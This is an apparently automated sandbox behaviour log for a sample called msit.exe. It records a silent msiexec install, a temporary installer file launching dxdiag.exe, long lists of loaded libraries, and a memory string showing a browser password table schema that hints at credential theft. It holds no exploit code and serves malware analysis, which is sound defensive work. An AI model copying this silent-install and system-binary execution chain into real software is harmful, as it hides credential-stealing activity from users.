              Source: dxdiag.exe, 00000007.00000003.1615956154.00000000051BA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615564283.00000000051D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msit.exeVirustotal: Detection: 9%
              Source: C:\Users\user\Desktop\msit.exeFile read: C:\Users\user\Desktop\msit.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\msit.exe "C:\Users\user\Desktop\msit.exe"
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 56DA3E3074202857EDF0B1EB72289577 C
              Source: C:\Users\user\Desktop\msit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi" /qn /norestart AI_SETUPEXEPATH=C:\Users\user\Desktop\msit.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736753519 "
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EF3F630DCAE1FED200E8C4DC6E58965E
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIA455.tmp "C:\Windows\Installer\MSIA455.tmp"
              Source: C:\Windows\Installer\MSIA455.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
              Source: C:\Users\user\Desktop\msit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi" /qn /norestart AI_SETUPEXEPATH=C:\Users\user\Desktop\msit.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736753519 " Jump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 56DA3E3074202857EDF0B1EB72289577 CJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EF3F630DCAE1FED200E8C4DC6E58965EJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIA455.tmp "C:\Windows\Installer\MSIA455.tmp"Jump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: lpk.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: msihnd.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\msit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: msit.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: msit.exeStatic file information: File size 20182372 > 1048576
              Source: msit.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c5800
              Source: msit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: msit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: msit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: msit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: msit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: msit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: msit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: msit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wininet.pdb source: shi95F5.tmp.0.dr
              Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: msit.msi.0.dr
              Source: Binary string: ucrtbase.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: MSIA2EC.tmp.2.dr, MSI986D.tmp.0.dr, MSI97FE.tmp.0.dr, MSI982E.tmp.0.dr, msit.msi.0.dr
